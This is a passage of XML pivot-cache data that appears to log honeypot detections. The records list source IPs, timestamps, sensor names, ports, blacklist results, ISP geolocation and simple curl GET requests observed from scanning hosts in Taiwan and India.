    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;26382&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;48788&amp;&amp;32657"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:82b2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3342"/>
    <x v="3342"/>
    <s v="59-126-62-141.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:16:09"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-03T11:16:09"/>
    <n v="409"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;40374&amp;&amp;NA&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:3e8d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3343"/>
    <x v="3343"/>
    <s v="59-126-39-217.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:15:03"/>
    <d v="2024-09-11T10:21:00"/>
    <d v="2025-04-03T11:15:03"/>
    <n v="413"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;30209&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7e:27d9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3344"/>
    <x v="3344"/>
    <s v="59-126-254-199.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:11:00"/>
    <d v="2023-12-03T12:37:00"/>
    <d v="2025-04-03T11:11:00"/>
    <n v="441"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21860&amp;&amp;23&amp;&amp;48050&amp;&amp;36152&amp;&amp;36166&amp;&amp;36182&amp;&amp;36200&amp;&amp;36213&amp;&amp;9100&amp;&amp;80&amp;&amp;33060"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:fec7"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3345"/>
    <x v="3345"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:10:01"/>
    <d v="2025-04-03T08:33:57"/>
    <d v="2025-04-03T11:10:01"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:4b4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3346"/>
    <x v="3346"/>
    <s v="114-34-192-249.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T11:04:49"/>
    <d v="2024-09-03T07:36:00"/>
    <d v="2025-04-03T11:04:49"/>
    <n v="606"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="63"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:c0f9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3347"/>
    <x v="3347"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:59:31"/>
    <d v="2025-04-03T10:59:31"/>
    <d v="2025-04-03T10:59:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:cafc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3348"/>
    <x v="3348"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:58:56"/>
    <d v="2024-11-28T12:52:28"/>
    <d v="2025-04-03T10:58:56"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-06-17"/>
    <s v="ADSL_BROADBAND"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1bff:8405"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3349"/>
    <x v="3349"/>
    <s v="NA&amp;&amp;59-126-254-42.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T10:57:01"/>
    <d v="2024-04-09T09:46:00"/>
    <d v="2025-04-03T10:57:01"/>
    <n v="281"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;36571&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:fe2a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3350"/>
    <x v="3350"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:49:14"/>
    <d v="2025-04-03T10:49:14"/>
    <d v="2025-04-03T10:49:14"/>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RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:b1d2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3351"/>
    <x v="3351"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:44:35"/>
    <d v="2024-04-02T07:52:00"/>
    <d v="2025-04-03T10:44:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="29207&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:31f9"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3352"/>
    <x v="3352"/>
    <s v="220-132-62-167.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T10:23:49"/>
    <d v="2024-08-26T16:46:09"/>
    <d v="2025-04-03T10:23:49"/>
    <n v="355"/>
    <s v="SQTK_GTDN"/>
